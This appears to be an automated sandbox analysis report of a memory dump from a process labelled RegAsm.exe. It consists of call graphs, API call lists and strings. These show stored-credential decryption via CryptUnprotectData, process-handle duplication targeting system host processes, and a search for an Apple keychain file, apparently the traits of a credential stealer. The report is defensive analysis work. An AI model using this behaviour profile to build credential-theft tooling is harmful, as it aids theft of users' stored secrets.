40244->40227 40245->40227 40246->40227 40247->40227 40248->40227 40249->40227 40250->40228 40251->40228 40252->40228 40253->40228 40254->40218 40255->40226 40257 438187 40256->40257 40258 438192 40256->40258 40262 4380f6 40257->40262 40258->40239 40260->40244 40261->40244 40264 43811f 40262->40264 40263 438164 40263->40258 40264->40263 40267 437e5e 40264->40267 40290 4300e8 memset memset memcpy 40264->40290 40291 437d3c 40267->40291 40269 437ea9 40275 437eb3 40269->40275 40276 437f22 40269->40276 40306 41f432 40269->40306 40272 437f06 40317 415c56 11 API calls 40272->40317 40274 437f95 40318 415c56 11 API calls 40274->40318 40275->40264 40277 437f7f 40276->40277 40278 432d4e 3 API calls 40276->40278 40277->40274 40279 43802b 40277->40279 40278->40277 40319 4165ff 11 API calls 40279->40319 40282 438054 40320 437371 137 API calls 40282->40320 40285 43806b 40286 438094 40285->40286 40321 42f50e 137 API calls 40285->40321 40287 437fa3 40286->40287 40322 4300e8 memset memset memcpy 40286->40322 40287->40275 40323 41f638 103 API calls 40287->40323 40290->40264 40292 437d69 40291->40292 40295 437d80 40291->40295 40324 437ccb 11 API calls 40292->40324 40294 437d76 40294->40269 40295->40294 40296 437da3 40295->40296 40299 437d90 40295->40299 40298 438460 133 API calls 40296->40298 40302 437dcb 40298->40302 40299->40294 40328 437ccb 11 API calls 40299->40328 40300 437de8 40327 424f26 122 API calls 40300->40327 40302->40300 40325 444283 13 API calls 40302->40325 40304 437dfc 40326 437ccb 11 API calls 40304->40326 40307 41f54d 40306->40307 40313 41f44f 40306->40313 40308 41f466 40307->40308 40358 41c635 memset memset 40307->40358 40308->40272 40308->40276 40313->40308 40315 41f50b 40313->40315 40329 41f1a5 40313->40329 40354 41c06f memcmp 40313->40354 40355 41f3b1 89 API calls 40313->40355 40356 41f398 85 API calls 40313->40356 40315->40307 40315->40308 40357 41c295 85 API calls 40315->40357 40317->40275 40318->40287 40319->40282 40320->40285 40321->40286 40322->40287 40323->40275 40324->40294 40325->40304 40326->40300 40327->40294 40328->40294 40330 41bc3b 100 API calls 40329->40330 40331 41f1b4 40330->40331 40332 41edad 85 API calls 40331->40332 40339 41f282 40331->40339 40333 41f1cb 40332->40333 40334 41f1f5 memcmp 40333->40334 40335 41f20e 40333->40335 40333->40339 40334->40335 40336 41f21b memcmp 40335->40336 40335->40339 40337 41f326 40336->40337 40340 41f23d 40336->40340 40338 41ee6b 85 API calls 40337->40338 40337->40339 40338->40339 40339->40313 40340->40337 40341 41f28e memcmp 40340->40341 40343 41c8df 55 API calls 40340->40343 40341->40337 40342 41f2a9 40341->40342 40342->40337 40345 41f308 40342->40345 40346 41f2d8 40342->40346 40344 41f269 40343->40344 40344->40337 40347 41f287 40344->40347 40348 41f27a 40344->40348 40345->40337 40352 4446ce 11 API calls 40345->40352 40349 41ee6b 85 API calls 40346->40349 40347->40341 40350 41ee6b 85 API calls 40348->40350 40351 41f2e0 40349->40351 40350->40339 40353 41b1ca memset 40351->40353 40352->40337 40353->40339 40354->40313 40355->40313 40356->40313 40357->40307 40358->40308 40390 41493c EnumResourceNamesW 37722 4287c1 37723 4287d2 37722->37723 37724 429ac1 37722->37724 37725 428818 37723->37725 37726 42881f 37723->37726 37740 425711 37723->37740 37736 425ad6 37724->37736 37792 415c56 11 API calls 37724->37792 37759 42013a 37725->37759 37787 420244 96 API calls 37726->37787 37730 4260dd 37786 424251 119 API calls 37730->37786 37734 4259da 37785 416760 11 API calls 37734->37785 37737 429a4d 37743 429a66 37737->37743 37744 429a9b 37737->37744 37740->37724 37740->37734 37740->37737 37741 422aeb memset memcpy memcpy 37740->37741 37746 4260a1 37740->37746 37755 4259c2 37740->37755 37758 425a38 37740->37758 37775 4227f0 memset memcpy 37740->37775 37776 422b84 15 API calls 37740->37776 37777 422b5d memset memcpy memcpy 37740->37777 37778 422640 13 API calls 37740->37778 37780 4241fc 11 API calls 37740->37780 37781 42413a 89 API calls 37740->37781 37741->37740 37788 415c56 11 API calls 37743->37788 37745 429a96 37744->37745 37790 416760 11 API calls 37744->37790 37791 424251 119 API calls 37745->37791 37784 415c56 11 API calls 37746->37784 37748 429a7a 37789 416760 11 API calls 37748->37789 37755->37736 37779 415c56 11 API calls 37755->37779 37758->37755 37782 422640 13 API calls 37758->37782 37783 4226e0 12 API calls 37758->37783 37760 42014c 37759->37760 37763 420151 37759->37763 37802 41e466 96 API calls 37760->37802 37762 420162 37762->37740 37763->37762 37764 4201b3 37763->37764 37765 420229 37763->37765 37766 4201b8 37764->37766 37767 4201dc 37764->37767 37765->37762 37768 41fd5e 85 API calls 37765->37768 37793 41fbdb 37766->37793 37767->37762 37772 4201ff 37767->37772 37799 41fc4c 37767->37799 37768->37762 37772->37762 37774 42013a 96 API calls 37772->37774 37774->37762 37775->37740 37776->37740 37777->37740 37778->37740 37779->37734 37780->37740 37781->37740 37782->37758 37783->37758 37784->37734 37785->37730 37786->37736 37787->37740 37788->37748 37789->37745 37790->37745 37791->37724 37792->37734 37794 41fbf8 37793->37794 37797 41fbf1 37793->37797 37807 41ee26 37794->37807 37798 41fc39 37797->37798 37817 4446ce 11 API calls 37797->37817 37798->37762 37803 41fd5e 37798->37803 37800 41ee6b 85 API calls 37799->37800 37801 41fc5d 37800->37801 37801->37767 37802->37763 37806 41fd65 37803->37806 37804 41fdab 37804->37762 37805 41fbdb 85 API calls 37805->37806 37806->37804 37806->37805 37808 41ee41 37807->37808 37809 41ee32 37807->37809 37818 41edad 37808->37818 37821 4446ce 11 API calls 37809->37821 37812 41ee3c 37812->37797 37815 41ee58 37815->37812 37823 41ee6b 37815->37823 37817->37798 37827 41be52 37818->37827 37821->37812 37822 41eb85 11 API calls 37822->37815 37824 41ee70 37823->37824 37825 41ee78 37823->37825 37883 41bf99 85 API calls 37824->37883 37825->37812 37828 41be6f 37827->37828 37829 41be5f 37827->37829 37834 41be8c 37828->37834 37848 418c63 37828->37848 37862 4446ce 11 API calls 37829->37862 37831 41be69 37831->37812 37831->37822 37834->37831 37835 41bf3a 37834->37835 37836 41bed1 37834->37836 37839 41bee7 37834->37839 37865 4446ce 11 API calls 37835->37865 37838 41bef0 37836->37838 37841 41bee2 37836->37841 37838->37839 37840 41bf01 37838->37840 37839->37831 37866 41a453 85 API calls 37839->37866 37842 41bf24 memset 37840->37842 37844 41bf14 37840->37844 37863 418a6d memset memcpy memset 37840->37863 37852 41ac13 37841->37852 37842->37831 37864 41a223 memset memcpy memset 37844->37864 37847 41bf20 37847->37842 37849 418c72 37848->37849 37850 418c94 37849->37850 37851 418d51 memset memset 37849->37851 37850->37834 37851->37850 37853 41ac52 37852->37853 37854 41ac3f memset 37852->37854 37857 41ac6a 37853->37857 37867 41dc14 19 API calls 37853->37867 37855 41acd9 37854->37855 37855->37839 37859 41aca1 37857->37859 37868 41519d 37857->37868 37859->37855 37860 41acc0 memset 37859->37860 37861 41accd memcpy 37859->37861 37860->37855 37861->37855 37862->37831 37863->37844 37864->37847 37865->37839 37867->37857 37871 4175ed 37868->37871 37879 417570 SetFilePointer 37871->37879 37874 41760a ReadFile 37876 417637 37874->37876 37877 417627 GetLastError 37874->37877 37875 4151b3 37875->37859 37876->37875 37878 41763e memset 37876->37878 37877->37875 37878->37875 37880 4175b2 37879->37880 37881 41759c GetLastError 37879->37881 37880->37874 37880->37875 37881->37880 37882 4175a8 GetLastError 37881->37882 37882->37880 37883->37825 37884 417bc5 37886 417c61 37884->37886 37890 417bda 37884->37890 37885 417bf6 UnmapViewOfFile CloseHandle 37885->37885 37885->37890 37888 417c2c 37888->37890 37896 41851e 18 API calls 37888->37896 37890->37885 37890->37886 37890->37888 37891 4175b7 37890->37891 37892 4175d6 CloseHandle 37891->37892 37893 4175c8 37892->37893 37894 4175df 37892->37894 37893->37894 37895 4175ce Sleep 37893->37895 37894->37890 37895->37892 37896->37888 39907 4147f3 39910 414561 39907->39910 39909 414813 39911 41456d 39910->39911 39912 41457f GetPrivateProfileIntW 39910->39912 39915 4143f1 memset _itow WritePrivateProfileStringW 39911->39915 39912->39909 39914 41457a 39914->39909 39915->39914

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040DDAD
                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                          • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                                                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                          • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                          • memset.MSVCRT ref: 0040DF5F
                                                                                                                          • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                          • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                          • API String ID: 2018390131-3398334509
                                                                                                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                            • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                          • free.MSVCRT ref: 00418803
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1355100292-0
                                                                                                                          • Opcode ID: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
                                                                                                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                          • Opcode Fuzzy Hash: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
                                                                                                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                          APIs
                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1945712969-0
                                                                                                                          • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                          • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1690352074-0
                                                                                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0041898C
                                                                                                                          • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InfoSystemmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3558857096-0
                                                                                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004455C2
                                                                                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                          • memset.MSVCRT ref: 0044570D
                                                                                                                          • memset.MSVCRT ref: 00445725
                                                                                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                            • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                          • memset.MSVCRT ref: 0044573D
                                                                                                                          • memset.MSVCRT ref: 00445755
                                                                                                                          • memset.MSVCRT ref: 004458CB
                                                                                                                          • memset.MSVCRT ref: 004458E3
                                                                                                                          • memset.MSVCRT ref: 0044596E
                                                                                                                          • memset.MSVCRT ref: 00445A10
                                                                                                                          • memset.MSVCRT ref: 00445A28
                                                                                                                          • memset.MSVCRT ref: 00445AC6
                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                          • memset.MSVCRT ref: 00445B52
                                                                                                                          • memset.MSVCRT ref: 00445B6A
                                                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                          • memset.MSVCRT ref: 00445986
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                          • API String ID: 2334598624-3798722523
                                                                                                                          • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                          • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                          • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                                                                                          • String ID: $/deleteregkey$/savelangfile
                                                                                                                          • API String ID: 1442760552-28296030
                                                                                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040B71C
                                                                                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
